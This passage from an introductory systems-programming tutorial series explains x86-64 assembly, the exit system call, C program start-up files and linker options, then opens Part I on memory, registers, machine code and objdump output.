 55 | In this simple case we are invoking the linker (`ld`) and we are instructing it to produce an executable named `c2-0s` (the `-o` flag again) out of a single object file. In general, the compiler is able to invoke the linker under the hood, and that is why you can produce a binary out of your source code invoking `gcc`... but be aware that, to do that, `gcc` is actually calling other programs, including the linker `ld`.
 56 | 
 57 | We will be using the assembler and the linker continuously. Do not worry if you haven't fully grasped the idea. You will as we go. For now, if you haven't fully understood this, just keep in mind that you have to use `nasm` to compile your ASM code, and `ld`, to produce an executable out of it.
 58 | 
 59 | # System Calls
 60 | At the beginning I said that we will be dealing with the other layers in our simplified SW model (OS, standard library,..). We have just seen that we need to produce our executable in a format that the OS can understand. But we have to interact with the OS.
 61 | 
 62 | For our simple example, our interaction with the OS consists of returning a value that we've calculated inside our program whenever our program's execution ends and returns control to the calling process (usually `bash`, the command-line interpreter). If we keep the value in a register inside our program there is no way to let anybody else know about it.
 63 | 
 64 | So, in order to interact with the OS we have to use a system call (**syscall**). The operating system offers some services to the applications running on it. These services are accessible using these system calls. Opening files, mapping memory, reading directory contents,... all these actions require interaction with the hardware (the hard drive, the memory management unit, the file system driver -ok, this one is not HW :)-,...) and are managed by the OS.
 65 | 
 66 | In the last two lines of our program we are actually using one of those services. The system call we are using is `SYS_EXIT`, that finishes the process returning a value to the calling process.
 67 | 
 68 | System calls are identified by a number, and the number for the `exit` syscall is `0x3c`. As you can see, in order to access a system call in a x86/64bits processor, we have to do 3 things (actually you can only see, explicitly, two of them in our example).
 69 | 
 70 | 1. Load the system call number in the `rax` register. 
 71 | 2. Load other required parameters in other registers. This we are not doing directly
 72 | 3. Use the `syscall` instruction to jump into kernel mode.
 73 | 
 74 | Yes, system calls are executed by the kernel (the OS), so what we basically do, is to put some values in some registers and then give control to the OS. The way to do that is platform-dependent. The `syscall` we used above is the standard way to invoke a system call on a x86 64bits. For 32 bits you usually invoke the software interruption 0x80 (`int 0x80`).
 75 | 
 76 | Let's reproduce the last lines of our program here again:
 77 | 
 78 | ```nasm
 79 | 	add rdi,rbx
 80 | 	mov rax, 0x3c
 81 | 	syscall
 82 | ```
 83 | 
 84 | We can clearly identify how we set `rax` with the value `0x3c` (the `exit` system call). We can also clearly identify how we give control to the kernel using the mnemonic `syscall`. But what is not clear is how do we pass the result of our operation to the `exit` call so the `$?` bash variable gets actually modified.
 85 | 
 86 | Well, for the `exit` system call, the `rdi` register has to be set with the value we want our program to return. That is why we have done the addition directly on the `rdi` register, so we do not have to explicitly set it before calling our system calls. Reordering the source code:
 87 | 
 88 | ```nasm
 89 | mov rax, 0x3c
 90 | add rdi, rbx          ====>  exit (a+b)
 91 | syscall           
 92 | ```
 93 | 
 94 | In this link you can find a list of system calls and the registers that you should use to pass parameters to them.
 95 | 
 96 | http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
 97 | 
 98 | # Getting our Function to Work
 99 | Now, we completely understand our assembly code, and we also know how to produce an executable out of it. The last piece in the puzzle is how the compiler+linker know that they have to run the code marked with the `_start` label.
100 | 
101 | In order to understand this, we are going to move into C and try to reproduce our assembly program. The same program in C would look like this:
102 | 
103 | ```C
104 | #include <unistd.h>
105 | 
106 | int main (void)
107 | {
108 |   int a = 10;
109 |   int b = 20;
110 |   
111 |   a = a + b;
112 |   _exit (a);
113 | }
114 | ```
115 | 
116 | So, in C, things are a bit different. Once compiled, whenever we run our program it will start executing whatever we write in the `main` function. This is how the language was defined. The code inside the `main` function, declares two integer variables (two integer numbers), adds them and then calls a function called `_exit`, passing as parameter the result of the sum.
117 | 
118 | This is pretty much the same thing we have done in ASM some paragraphs above, but using the C programming language. Yes, we removed the `register` keyword here, the compiler will not honour it in the `main` function directly, so, let's forget about it for now.
119 | 
120 | Let's now go line by line for the less experienced readers. Advanced readers can safely skip the next sections
121 | 
122 | ## First Line
123 | The first line found in the program is:
124 | 
125 | ```C
126 | #include <unistd.h>
127 | ```
128 | 
129 | This line is a pre-processor directive. Anything starting with a `#` in a C program is a pre-processor directive. These directives are instructions to a program called `cpp`. This program is run before the actual compilation and it effectively modifies our source code in different ways before it is compiled.
130 | 
131 | > NOTE: Old compilers require pre-processor directives to be placed at column 0. If you get a weird error message and everything looks fine, try to put your pre-processor directives at the beginning of the line
132 | 
133 | In this case, the `#include` directive, as you can imagine, includes the indicated file at that position in the source code. Not sure what this means? OK, no problem. Let's see what the pre-processor will produce for our program:
134 | 
135 | 
136 |     $ cpp c2-1.c | less
137 | 
138 | Now take a look to `unistd.h`... it is located in the system include folder:
139 | 
140 |     $ more /usr/include/unistd.h
141 | 
142 | Well, that was not a great idea. This file has a lot more pre-processor directives... some that we have not used yet. However, I hope you get the idea. The content of `unistd.h` is included at the `#include` location in our source code... and any other pre-processor directives in that file are processed recursively.
143 | 
144 | Actually, for our simple C program we just need one line (in fact we do not even need that, but let's be legal); the prototype of the `_exit` function. If you look for it in the output of the pre-processor you will find something like this:
145 | 
146 | ```C
147 | extern void _exit (int __status) __attribute__ ((__noreturn__));
148 | ```
149 | 
150 | That is the only line we really need. We will describe in detail what a prototype is and how to use them later in this course. For the time being, you just need to know that, in order to be able to use a function that is defined outside our C source code, we have to provide the declaration for that function... (this is not the complete story but it is enough for now).  In general, what we need to tell the compiler is the return type and number and types of parameters... but we haven't talked about types yet... just keep in mind that you need to tell the computer what the function you want to call looks like and you do that with a function prototype.
151 | 
152 | ## The `main` function
153 | The next line in our C program is the `main` function. As we have already said, this is the function that gets executed whenever we launch our program. The `main` function is usually declared in two different ways.
154 | 
155 | The simplest one is the one we used in this example. Whenever you are not interested in command-line parameters, you can declare `main` as a function that returns an integer (`int`) and does not receive any parameter (`void`).
156 | 
157 | However, you usually want to access command-line parameters provided by the user. In those cases, the `main` function is declared as:
158 | 
159 | ```C
160 | int main (int argc, char *argv[])
161 | ```
162 | 
163 | You can change `argc` and `argv` for whatever identifiers you want. However those are the names universally used for the `main` function parameters.
164 | 
165 | The first argument `argc` is an integer that indicates the number of command-line parameters the user has provided when launching the application. The `argv` is an array of strings. One string for each space separated parameter provided by the user (unless you quote the parameters). Again, we will talk about this later. Right now, we just need to know that `main` is the function that gets first executed and it can be declared in, at least, two different ways...
166 | 
167 | ## The `_exit()` Function Call
168 | 
169 | The body of the function should be clear by now, so it is only the last line that needs some explanation. The last line is a function call... you will recognize that by the parenthesis. In this case, the `_exit` function is a wrapper around the `exit` system call, provided by the standard C library. Here we see clearly how the standard C library lays on top of the operating system interface, and gives us a simpler interface to access the functions provided by the OS.
170 | 
171 | To my knowledge, there is no standard way to directly access system calls from a C program without using the standard C library. Apparently the old `_syscall` function is deprecated and it is, anyway, a function from the standard C library.
172 | 
173 | In a normal C program, you will usually see the `exit` function to exit a program, instead of the `_exit` that we are using. The first one is a higher level version defined in `stdlib.h` (the standard library header) instead of the slightly lower level version defined in `unistd.h` (UNIX standard include). Check the man page for `_exit` to know about the differences.
174 | 
175 | In short, `_exit` is the closest we can get to the `SYS_exit` system call from C... it does a couple things less than the standard `exit`. OK, nevermind... we are going to get rid of it anyway pretty soon.
176 | 
177 | # Wait a Second...
178 | So...when I write a C program, my program starts running at `main`, but when I write an ASM program, it starts running at `_start`?... why?
179 | 
180 | That is a good question. Actually, that is not true. In both cases the function/code that gets executed at the very beginning is the one pointed by `_start`. However, a standard C program, does quite a lot of things before the `main` function gets actually executed. And know what...we can actually make our C program look a lot more like the ASM version.
181 | 
182 | What happens is that the linker (do you remember that guy) is adding a default version of `_start` that, at the very end calls our `main` function. This code is contained in a file called `crt1.o`... and sure, we can get rid of it.
183 | 
184 | Let's rename our `main` function to `_start`. Our program will look like this:
185 | 
186 | ```C
187 | #include <unistd.h>
188 | 
189 | void _start (void)
190 | {
191 |   register  int a = 10;
192 |   register  int b = 20;
193 | 
194 |   a +=b;
195 |    _exit (a);
196 | }
197 | ```
198 | 
199 | Now we have to tell the compiler that we do not want to use `crt1.o`. The compiler knows this file (and some other ones used for application start up) as a _start file_:
200 | 
201 | 
202 |     $ gcc -nostartfiles -o c2-2 c2-2.c
203 |     $ ./c2-2; echo $?
204 |     30
205 | 
206 | 
207 | Good. Our program still works the same. We have made it start at `_start` instead of at `main` and, now, it looks a lot closer to our original ASM code. Actually we have achieved a big improvement. Let's produce a static version of our original C code using the start files, and our last version without using them.
208 | 
209 |     $ gcc -static -o c2-1s c2-1.c
210 |     $ gcc -static -nostartfiles -o c2-2s c2-2.c
211 |     $ ls -l c2-?s | awk '{print $9, $5;}'
212 |     c2-0s 737
213 |     c2-1s 872956
214 |     c2-2s 5420
215 | 
216 | Wow... that is a big difference in size!... We are still far away from the size of our first assembly version, but that is not bad. Try to do an `objdump` on the two files produced from C source code to see what's the difference.
217 | 
218 | # The Last Step
219 | There is one last thing we can do, to get even closer to our original ASM code. We can get rid of the C library!
220 | 
221 | If you have been paying attention, I said before that we need the standard C library to invoke a system call in a portable way. But what if we do not care about portability?... Yes, we already know how to invoke the `exit` system call from ASM... So, why don't we get rid of the C library and provide our own implementation for the `_exit` function? Let's try:
222 | 
223 | So, let's create a new file named `exit.s` and let's declare the `_exit` symbol in there together with our ASM code to call the `exit` syscall:
224 | 
225 | ```nasm
226 |     .global _exit
227 | _exit:
228 |     mov $0x3c, %eax
229 |     syscall
230 | ```
231 | 
232 | This should be pretty basic. You may be missing something... aren't you? Sure. Where is our parameter? Well, it is actually there just because of the standard C **ABI** (_Application Binary Interface_). The ABI defines, among other things, how parameters are passed to functions. We will be discovering it as we go on through this course. For now, it is enough to know that the first parameter we pass to a C function is stored in the `rdi` register (supposing it fits there).
233 | 
234 | Note that this is for x86 64bits processors. 32 bits and other processors follow different ABIs and the parameters are passed in different ways. This is one of the reasons why it is a bad idea to do what we are doing if we are planning to re-compile our programs for different platforms... This is one of the reasons why the standard C library is there... To make our C code portable.
235 | 
236 | Let's try to recompile our program. We do not have to change anything on the code. We are just going to use our new `_exit` function and tell the compiler to forget about the standard C library (`libc`) version of `_exit`.
237 | 
238 |     $ gcc -static -nostartfiles -nostdlib -o c2-3s c2-2.c exit.s
239 |     $ ls -l c2-?s | awk '{print $9, $5;}'
240 |     c2-0s 737
241 |     c2-1s 872956
242 |     c2-2s 5420
243 |     c2-3s 1341
244 | 
245 | The first thing to note is that the `-nostdlib` flag is the one that lets us remove the standard C library. The second is that we can pass assembly source files directly to `gcc`!!!. The third one is that our program that was close to 1MB when we started is now slightly above 1KB!. We have got pretty close to the size of our original assembly version!
246 | 
247 | Actually, if we strip the binaries, the difference of removing the standard C library is not that relevant, but our C version size still doubles the original assembly one:
248 | 
249 |     $ sstrip -z c2-0s
250 |     $ sstrip -z c2-1s
251 |     $ sstrip -z c2-2s
252 |     $ sstrip -z c2-3s
253 |     $ ls -l c2-?s | awk '{print $9, $5;}'
254 |     c2-0s 148
255 |     c2-1s 789552
256 |     c2-2s 589
257 |     c2-3s 369
258 | 
259 | # A Word on the Linker
260 | Before finishing this paper, let me share with you a couple of words about the linker. You may be wondering (I did some time ago) who decides that `_start` is the first function to run, or why my `.text` segment goes to address `0x400000` (again on a 64 bits computer). OK, the answer to all these questions is: **THE LINKER**.
261 | 
262 | You can modify those values using linker flags. For instance, let's change our entry point to `_start1` and put our `.text` segment at `0x500000` instead of `0x400000`
263 | 
264 |     $ gcc -static -nostdlib -nostartfiles -o kk c2-3.c exit.s -Wl,-e_start1 -Ttext=0x500000
265 |     $ readelf -hs kk
266 |     ELF Header:
267 |       Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
268 |       Class:                             ELF64
269 |       Data:                              2's complement, little endian
270 |       Version:                           1 (current)
271 |       OS/ABI:                            UNIX - System V
272 |       ABI Version:                       0
273 |       Type:                              EXEC (Executable file)
274 |       Machine:                           Advanced Micro Devices X86-64
275 |       Version:                           0x1
276 |       Entry point address:               0x500000
277 |       Start of program headers:          64 (bytes into file)
278 |       Start of section headers:          1048800 (bytes into file)
279 |       Flags:                             0x0
280 |       Size of this header:               64 (bytes)
281 |       Size of program headers:           56 (bytes)
282 |       Number of program headers:         3
283 |       Size of section headers:           64 (bytes)
284 |       Number of section headers:         8
285 |       Section header string table index: 5
286 | 
287 |     Symbol table '.symtab' contains 12 entries:
288 |        Num:    Value          Size Type    Bind   Vis      Ndx Name
289 |          0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
290 |          1: 0000000000500000     0 SECTION LOCAL  DEFAULT    1
291 |          2: 00000000004000e8     0 SECTION LOCAL  DEFAULT    2
292 |          3: 0000000000500030     0 SECTION LOCAL  DEFAULT    3
293 |          4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
294 |          5: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS c2-3.c
295 |          6: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS
296 |          7: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 __bss_start
297 |          8: 0000000000500000    38 FUNC    GLOBAL DEFAULT    1 _start1
298 |          9: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 _edata
299 |         10: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 _end
300 |         11: 0000000000500026     0 NOTYPE  GLOBAL DEFAULT    1 _exit
301 | 
302 | As you can see, the `_start1` function is located at `0x500000` that is actually our entry point (check the ELF header just above).
303 | 
304 | As you may have already figured out, the `-Wl,XXX` is the way to feed options to the linker from the compiler. Alternatively you can create `.o` object files and then link manually, passing the options to the linker normally. The same way we did with our first ASM program.
305 | 
306 | You may be wondering now. That's fine... more command-line options. But usually I do not set those command-line options when I compile my programs. Where do all those values come from?
307 | 
308 | Again a very legit question. I will not completely answer it, but I will give you some hints to get some fun yourself in case you are interested in this stuff.
309 | 
310 | The first hint is **'linker script'**. It is very likely that you will never see one of those, even if you become a professional programmer. And it is even more likely that you will never have to write one of those. However, if you go into the world of embedded systems... well, you will surely have to deal with them.
311 | 
312 | The second one is:
313 | 
314 |     $ gcc -o c2-1 c2-1.c -Wl,-verbose
315 | 
316 | 
317 | # CONCLUSIONS
318 | In this part we have learnt how to convert an ASM source file into an executable program for the Linux OS. We have also got a basic idea on how to use system calls and also how the program start up process in a C program relates to a similar program written in ASM code.
319 | 
320 | Finally, we have learnt about the main parts of a C program which are automatically and silently added to our code whenever we compile it. We have also seen how the standard library provides a portable and uniform interface for our C programs and how it hides the platform-specific details to interface with the Operating System. In a sense we have also experienced how this Standard library stacks on top of the OS, that stacks on top of the _Bare Metal_.
321 | 
322 | In this trip, we have seen how to strip down a C program to reduce it to its minimal expression... really close to what we can achieve writing our code directly in ASM... and how we lost, in the process, the portability of our code.
323 | 
324 | 
325 | * PREVIOUS: [Programming for Wannabes. Part I. Your first Program](part-01.md)
326 | * NEXT: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
327 | 


--------------------------------------------------------------------------------
/part-01.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part I. Your first Program
  2 | 
  3 | If you are reading this, it is because you want to be a hacker. Therefore, you are automatically a [wannabe](http://www.catb.org/jargon/html/W/wannabee.html). It does not sound that cool, but it is actually pretty cool. It means that you still have a lot of exciting things to discover!!!
  4 | 
  5 | First things first. This is going to be a joint course on C and assembly programming. Those are the only two languages a real hacker has to know. Yes. Really. The only two languages that will let you do the real hacking. You can do some stuff with Python or PowerShell... but that is Skid stuff.. You know what the S on skid stands for... don't you?. It stands for Script :stuck_out_tongue_winking_eye:
  6 | 
  7 | Easy, this was just a joke to catch your attention. Now seriously. Learning scripting languages is a powerful tool and will save you a lot of time in many cases. Mastering Python is indeed a great skill and it is something you should invest time on. Analogously, C and assembly are the only way forward for some topics: reverse engineering, kernel level rootkits, and some system level programming can only be done with those low level languages. So, if you really want to be a hacker... man, there is no way around, you gotta have to learn CASM (C + ASM :).
  8 | 
  9 | Two notes before we start:
 10 | 
 11 | - I'm not a hacker myself. Not even a wannabe. Really I do not have any interest in becoming a hacker. This basically means that you should take this course as a starting point. When you get done with it... then... your journey will really start.
 12 | - No. HTML is not a programming language. If you think that... you really need to go through this course. :stuck_out_tongue_closed_eyes:
 13 | 
 14 | The course will be organized as follows:
 15 | 
 16 | - Some introduction to what a computer is. These are low level languages and you need to get to know low level stuff
 17 | - That is it for now :P
 18 | 
 19 | # How have you ended up here?
 20 | That is a good question. In all honesty there are zillions of C/ASM programming tutorials and courses out there. I know, they look useless. They are not what you are looking for. That's fine... and that is why you are reading this right now.
 21 | 
 22 | To understand why all those tutorials haven't helped you, we need to learn a little bit about the different layers beneath the tools we want to build... Yes, layers. There are lots of them.
 23 | 
 24 | So, let's start this trip bottom-up. At the very low level you have what is usually known as the _Bare Metal_. That is roughly the computer processor and the memory. We may consider the BIOS to be also at this level and some other elements usually grouped under the generic name of chipset.
 25 | 
 26 | On top of the _Bare Metal_ we find the _Operating System_. The operating system is in charge of managing the HW. There is a lot to do there and each hardware device has its own peculiarities (that's why we have all those drivers). The operating system gives us standard services to access the disk, the memory, the USB devices... You can indeed do all this at the _Bare Metal_ layer but... then you will end up writing an operating system...
 27 | 
 28 | The next layer we find is the _System Libraries_ layer. These are normal fragments of code that are used by many different programs. We group those pieces of code in a file and we call it a library.  Then we can use that code from our programs. There are literally thousands of libraries available for any OS out there.
 29 | 
 30 | The top level of this stack of layers are the _Programs_ (this also includes Application Level Libraries). These are the things you want to write yourselves when you decide to learn how to program a computer. You write these programs in some programming language. C and ASM are two of those programming languages... There are hundreds of them, and you should learn quite some and choose the right one for the task you want to accomplish. 
 31 | 
 32 | # Going Top Down
 33 | OK, fair enough. Now that we are at the top level, let's look down for a while. You have learnt a specific language.
 34 | 
 35 | Let's say you have learnt C using one of those on-line tutorials. The original C language has 32 keywords. The syntax is pretty simple and easy to learn. Yes, really, it is a pretty simple language. However, knowing the C keywords and syntax does not let you do much.
 36 | 
 37 | You need to learn something more. At least, one thing called the _Standard C library_. Without this, you cannot even print anything on the screen, read any user input or deal with files. And this happens with nearly all programming languages out there. You need a minimal library to be able to interact with your operating system and then, let your operating system deal with the _Bare Metal_.
 38 | 
 39 | Therefore, learning the syntax of a language, and the basics of its standard libraries only brings you half way (in the best case) to where you were aiming to be. 
 40 | 
 41 | Learning C and ASM to become a hacker requires you to learn not just the language keywords, syntax, idioms, (put whatever nowadays buzzword in here)... You also need to learn how to use the system libraries, how does your operating system works and also how does your computer works.
 42 | 
 43 | That is why there is a huge difference between a C programming course that teaches you how to code C and a hacking programming course that teaches you how to do stuff. Usually, after you have learnt the syntax, you have to go into specific courses tutorials: Network Programming, Kernel Programming, 3D graphics programming, GUI programming,... Each one of those has their own peculiarities and requires quite some time to manage them. In a sense we will be covering here what is generally known as _System Programming_. This cover quite some of the topics usually related to hacking.
 44 | 
 45 | Hope that at this point you have understood, that hacking/system programming is not about learning a programming language. That is the simplest part. You have to learn a lot of other things... summing up. You have to learn what is going on every time you type a line of code.
 46 | 
 47 | So, it is time to learn the basics about a computer. C and ASM are low level programming languages. We will see soon how true this is. This means, that, to really master those programming languages you need to know, at least, the basics of how does a computer works.
 48 | 
 49 | # The Simplest Computer in The World
 50 | Despite how much people think technology has advanced in the last decades, the reality is that computers haven't changed much in nearly 50 years. They are faster, they are smaller, they consume less power... but they still work the same way. Indeed, this is a simplification, but at the level at which we are going to work this is actually the case.
 51 | 
 52 | For illustration purposes, let's introduce the SCTW-2000. This is a fictional computer that will let us introduce different concepts in a generic way. It could easily be one of the popular home microcomputers from the 80s. We will match the SCTW-2000 with real examples, but we will avoid using real computers, at least at the beginning and for the sake of simplicity.
 53 | 
 54 | The SCTW-2000, as many other computers out there is basically composed of two main parts: CPU and memory
 55 | 
 56 | Let's dive into each of these elements to get the big picture.
 57 | 
 58 | # The Memory
 59 | There are a lot of different types of memories: RAM, ROM, SRAM, DRAM, SDRAM, PROM, FLASH, Serial FLASH, ... From a SW point of view, unless we go really low level (something we are not going to do in this course), we do not care about the type of memory our computer have. That is important for the HW guys but not for us. At least not now. What is important for us is how does this element fit within the overall computer architecture.
 60 | 
 61 | For the time being, let's imagine the computer's memory as a huge bunch of drawers, one on top of the other. Inside each drawer we can store one number. An 8-bit number, or in other words, a number between 0 and 255 (that is 2^8 values... 8 bits).  Finally, let's number the drawers, starting from the one at the bottom (number 0), and giving consecutive numbers to the drawers on top. Something like this:
 62 |   
 63 |     +--------+
 64 |     | 8 bits | Drawer 3
 65 |     +--------+
 66 |     | 8 bits | Drawer 2
 67 |     +--------+
 68 |     | 8 bits | Drawer 1
 69 |     +--------+
 70 |     | 8 bits | Drawer 0
 71 |     +--------+
 72 | 
 73 | The higher the memory in our computer, the taller the drawer pile will be. For instance, if our computer have 64KB of RAM... yes it sounds ridiculous nowadays, it is just an example. So a computer with 64 KB of memory will have 65536 drawers one on top of the other.
 74 | 
 75 | Each drawer is known as a memory address, and the number inside the drawer is the content of that memory address.
 76 | 
 77 | This is it about the memory for now. Let's look to the CPU
 78 | 
 79 | # The CPU
 80 | The CPU is the other main component of the computer. It is composed of the following parts:
 81 | 
 82 | * A set of registers
 83 | * An Arithmetic-Logic Unit (ALU)
 84 | * Some control logic.
 85 | 
 86 | 
 87 | ## Registers
 88 | Let's start with the registers. You can see the CPU registers as a small piece of memory that is inside the CPU and therefore it is super fast, and can hold numbers bigger than the 8 bits stored in each of our fictional memory addresses. On the other hand, this is a very small memory, something in the range of 4 to 32 positions (drawers). Compare that to the 65536 drawers of our ridiculously small 64KB memory... Each of these positions is known as a register. Registers can be numbered starting from 0 like the memory or they can be named.
 89 | 
 90 | For instance the Z-80 processor, named their registers as: `AF, BC, DE, HL, IX, IY`. The Intel processors traditionally named their registers as: `AX, BX, CX, DX, SI, DI`,... Motorola processor used more systematic naming schema for their registers: `A0-A7` (_address registers_) `D0-D7` (_data registers_) for its 68K. 
 91 | 
 92 | As the number of available registers grows, it is usual to follow the Motorola schema and name the registers with a consecutive number. This way, X86-64 (64 bits intel/amd processors) name their registers (the general purpose ones) `r0-r15` (lower register have names compatible with the i386 processor). Same with MIPS and ARM processor.
 93 | 
 94 | Any way. Most of the processors used to build computers have a set of registers. A very fast and very small memory area inside the processor itself.
 95 | 
 96 | ## The ALU
 97 | The second element of the processor is the Arithmetic-Logic Unit. And yes, it basically performs arithmetic and logic operations. You can add, subtract, multiply, and, or, xor values using this processor element... and that is what a computer actually does most of the time.
 98 | 
 99 | The ALU performs this operations either using the values stored in the registers or values taken from the memory, and stores the results, again, either in a register or a memory address. The available options actually depends on the processor. Old processor only could perform operation on registers and some only on certain registers. Nowadays, this is no longer the case.
100 | 
101 | This is really it for the ALU
102 | 
103 | ## The Control Unit
104 | The last part of the processor we are interested in is the Control Unit. In all honesty, in this simplified computer model, the control unit is anything else inside the processor except the registers and the ALU (branch prediction unit, cache management, bus signaling, pipeline management, memory management unit...). We won't go into details about most of those circuitries in this course, however, there are a couple of basic functions that we have to be aware of.
105 | 
106 | One of these things  is controlling the CPU external interface. In other words, the state of all those little pins that go out of the CPU chip. Using these pins, the processor can talk to the memory to read and write values in those drawers and can also interface to different types of hardware...
107 | 
108 | So, when the ALU needs some data from the memory to perform some operation, it asks the control unit to activate the right pins on the processor to command the memory chip to read or write a given memory position. The memory chip will get the value to write from some CPU pins or put the value to read in some other pins (or multiplex these two pin sets, that is using the same pins for reading/writing and even addressing the memory). OK, it does not really work like this, but otherwise we will have a very, very long introductory chapter ;)
109 | 
110 | The control unit is also in charge of reading the program from memory, parsing it and executing the machine code....
111 | 
112 | # Machine Code
113 | We will not talk much about machine code... we will be talking about ASM, but, you at least need to know what this machine code is. For that, we need to understand how the CPU runs a program and how does a program looks like.
114 | 
115 | The first thing we have to introduce is the __Program Counter__ (`PC`) or __Instruction Pointer__ (`IP`). The name depends on the processor family you are working with. This is a special register in the CPU that indicates which memory address in the main memory contains the next instruction to run. Whenever the processor executes an instruction, the `IP` is increased by one (actually it may be more than one, if the current instruction takes several bytes... more on this in a sec), unless the instruction is a branch/jump. In that case, a new value is assigned to the `IP` so the next instruction will be taken from a new position.
116 | 
117 | But, you may be wondering... what are those instructions?. OK, no panic. Let's go back for a second to our fictional SCTW-2000. Now that we know a lot about processors, I can tell you about the specs for the awesome SCTW-2000:
118 | 
119 | - It has 2 registers named `EBX` and `EBP` (you will see later why we have chosen these names), plus an instruction pointer named `RIP`
120 | - The ALU can perform the following operation: `ADD` two registers
121 | - It has an instruction `MOV` to assign values to registers.
122 | - After reset (or on power on) all registers are set to 0 (including `RIP`)
123 | 
124 | Now, to fully specify the SCTW-2000 we have to define the instruction it can run. The numbers the control unit will be able to understand... that is _the machine code_. For the SCTW-2000 it is something like this:
125 | 
126 |     OPCODE     | MNEMONIC    | Description
127 |     -----------+-------------+-----------------------------------------------
128 |     0xbb XX    | MOV EBX, XX | Copies the value XX in register EBX
129 |     0xbd XX    | MOV EBP, XX | Copies the value XX in register EBP
130 |     0x01 XX YY | ADD XX, YY  | Adds the values of register XX and register YY
131 |                |             | and stores the result in register XX
132 |     0x90       | NOP         | No Operation. Does nothing
133 |     0xff       | HALT        | Stops the processor
134 | 
135 | As you can see we have used three columns for this table. The first column contains only numbers (1, 2 or 3 numbers depending on the instruction). Yes, instructions may take, and actually do take, more than one single memory address. This is the __machine code__, the sequence of numbers stored in memory that the CPU can understand.  We have chosen some arbitrary opcodes (not so arbitrary but for the time being, it does not really matter which OPCODES we've chosen).
136 | 
137 | Remembering those numbers is hard for humans. Sure, we can manage for the SCTW-2000, but a real processor may easily have hundreds of those OPCODEs. For that reason, we use something a bit easier to remember for us (that's why this is named [mnemonics](https://en.wikipedia.org/wiki/Mnemonic_(disambiguation)) - from the greek "_memory related_", yes a bit of a free translation)... That is actually the assembly language that you are trying to learn. The ASM language has to be converted into machine code... that is the task of the program known as __assembler__.
138 | 
139 | # Our first program
140 | To illustrate all this, let's write a simple program that adds two numbers: `10` and `20`. The assembly code for the SCTW-2000 and for such a stupid program will be:
141 | 
142 | ```nasm
143 | MOV EBX, 10
144 | MOV EBP, 20
145 | ADD EBX, EBP
146 | HALT
147 | ```
148 | 
149 | Now let's do the work of the assembler by hand using the opcode/mnemonic table above:
150 | 
151 | ```nasm
152 | ASM             MACHINE CODE
153 | MOV EBX, 10  -> 0xbb 0x0a
154 | MOV EBP, 20  -> 0xbd 0x14
155 | ADD EBX, EBP -> 0x01 0x00 0x01
156 | HALT         -> 0xff
157 | ```
158 | Now we can put the program in our memory:
159 | 
160 |     ADDR-07 | 0xff |
161 |     ADDR-06 | 0x01 |
162 |     ADDR-05 | 0x00 |
163 |     ADDR-04 | 0x01 |
164 |     ADDR-03 | 0x14 | 
165 |     ADDR-02 | 0xbd |
166 |     ADDR-01 | 0x0a |
167 |     ADDR-00 | 0xbb | <= RIP
168 | 
169 | Our program requires 8 bytes of memory. We copy the program starting at position 0, and after resetting the SCTW-2000 (sure, we are using SDRAM for the SCTW-2000), the `RIP` will point to address 0 and will start reading the machine code and executing the instructions. 
170 | 
171 | > Not all processor starts execution at address 0. You have to check the datasheet for the processor to figure out the boot process and conditions
172 | 
173 | # C as a Low-Level Programming Language
174 | Before finishing this first part, we have to quickly introduce the other language we are going to work with in this course and we also have to justify why we shall consider C a low level programming language.
175 | 
176 | For doing that, we are going to try to produce exactly the same code we have generated by hand in the previous section, using a C program. Instead of the SCTW-2000, we are going to use an Intel 64bits... You will see how similar these two processors are :)
177 | 
178 | Let's write this program in a text file. Call it `ph1.c`
179 | 
180 | ```C
181 | int f1 (void)
182 | {
183 |   register  int a = 10;
184 |   register  int b = 20;
185 | 
186 |   a += b;
187 |   return a;
188 | }
189 | int main (void)
190 | {
191 |   int a;
192 |   a = f1();
193 | }
194 | ```
195 | 
196 | The program looks a bit weird. The reason is that we are not working at the bare metal level. We have an operating system and a file format to honour, so the compiler has to create quite some more stuff than just the machine code for our code. Moreover, we have to use everything we put in the code, otherwise, the compiler will realise that, and remove the code detected as dead (the one that will never be used)... which is bad for our didactic purposes.
197 | 
198 | We will progressively go into all those details. Right now, it is not really needed to completely understand what is going on. You just need to realize a couple of things.
199 | 
200 | First, concentrate on the function `f1`, at the beginning of the program. No need to fully understand the syntax, just pay attention to the following:
201 | 
202 | * The `register` keyword in C, tell the compiler that we want to use a register. By default it will try to use memory for variables (actually the stack, but we haven't talked about it yet), but, as you can see we can force the compiler to produce machine code that uses the registers... as we did with our assembler version.
203 | * Then you can see the equivalent to our assembler program. We store 10 in one variable (that will be hold in a register), 20 in another, and then we add both number and store it in the first variable. This is roughly the ASM code we wrote before!!!!
204 | 
205 | Let's compile the program and take a look to the machine code:
206 | 
207 | `$ gcc -fomit-frame-pointer -o ph1 ph1.c`
208 | 
209 | The `-fomit-frame-pointer` is just to remove some code generated by the compiler that is not relevant right now. And what we've got out of this compilation is:
210 | 
211 |     $ objdump -M intel -d ph1 | grep -A 20 '<f1>'
212 |     00000000004004b4 <f1>:
213 |       4004b4:	55                   	push   rbp
214 |       4004b5:	53                   	push   rbx
215 |       4004b6:	bb 0a 00 00 00       	mov    ebx,0xa
216 |       4004bb:	bd 14 00 00 00       	mov    ebp,0x14
217 |       4004c0:	01 eb                	add    ebx,ebp
218 |       4004c2:	89 d8                	mov    eax,ebx
219 |       4004c4:	5b                   	pop    rbx
220 |       4004c5:	5d                   	pop    rbp
221 |       4004c6:	c3                   	ret
222 | 
223 | I had kindly asked  `objdump` to produce intel assembly because it's closer to the one we used for our awesome SCTW-2000 (that is the `-M intel` flag).  
224 | 
225 | Let's look at `0x4004b6` to `0x4004c0`:
226 | 
227 |       4004b6:	bb 0a 00 00 00       	mov    ebx,0xa
228 |       4004bb:	bd 14 00 00 00       	mov    ebp,0x14
229 |       4004c0:	01 eb                	add    ebx,ebp
230 | 
231 | So, this looks pretty similar to the machine code, we generated for our fictional SCTW-2000 processor. The main differences:
232 | 
